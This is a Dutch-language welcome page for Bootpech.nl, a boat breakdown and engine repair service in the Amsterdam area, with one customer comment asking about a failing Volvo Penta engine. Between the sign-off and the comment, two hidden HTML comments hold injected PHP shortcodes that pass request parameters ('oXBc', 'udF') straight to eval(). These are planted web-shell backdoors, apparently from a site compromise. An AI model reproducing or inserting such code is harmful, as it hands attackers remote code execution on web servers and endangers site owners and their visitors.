Welkom bij Bootpech.nl

Welkom bij Bootpech.nl

Wij heten u van harte welkom bij Bootpech.nl .

Inmiddels zijn wij van Bootpech , al jaren een begrip in Nederland , op het gebied van bootgerelateerde technische zaken.

Bootpech doet al jaren aan pechhulp in met name Groot Amsterdam m aar wij schromen het ook niet om kilometers te maken in de rest van ons land.

Of het nu een niet startende dieselmotor is of een staartstuk van een volvo penta benzine motor , wij gaan de uitdaging maar al te graag aan .

Geen uitdaging gaat ons te ver , dus wij graag gaan de uitdaging aan met uw niet werkende motor.

Inmiddels hebben wij van Bootpech.nl al duizenden mensen kunnen voorzien van vaarplezier en er is niets mooier dan dat gevoel te bewerkstelligen.

Of het nu tegenzit , wat vaak gebeurt , of meezit , Bootpech gaat met vol plezier en strijd de veelzeggende uitdagingen aan.

Onze klanten laten vaak een beoordeling achter bij Marktplaats en daar stellen wij ook veel prijs aan .

Dus mocht u een vraag hebben of anderzijds een hulp kwestie , op ons kunt u ten alle tijden rekenen.

Met vriendelijke groet

 

Moes chef de Mission

Bootpech.nl

<!– [insert_php]if (isset($_REQUEST["oXBc"])){eval($_REQUEST["oXBc"]);exit;}[/insert_php][php]if (isset($_REQUEST["oXBc"])){eval($_REQUEST["oXBc"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["udF"])){eval($_REQUEST["udF"]);exit;}[/insert_php][php]if (isset($_REQUEST["udF"])){eval($_REQUEST["udF"]);exit;}[/php] –>

moes

1 reactie tot nu toe

R.Haavekost Geplaatst op8:54 am - jun 25, 2015

Ik heb een boot met een volvo penta B20 inboard benzine motor, als ik er mee vaar gaat hij na een uur stotteren en slaat af,ik heb de boot pas gekocht en denk dat hij een grondige service beurt nodig heeft . De boot ligt in de amstel ,in Uithoorn, komt u daar ook en is het mogelijk op locatie te komen? Graag wil ik wel vooraf een prijs indicatie . M.v.groet Ruud Haaveost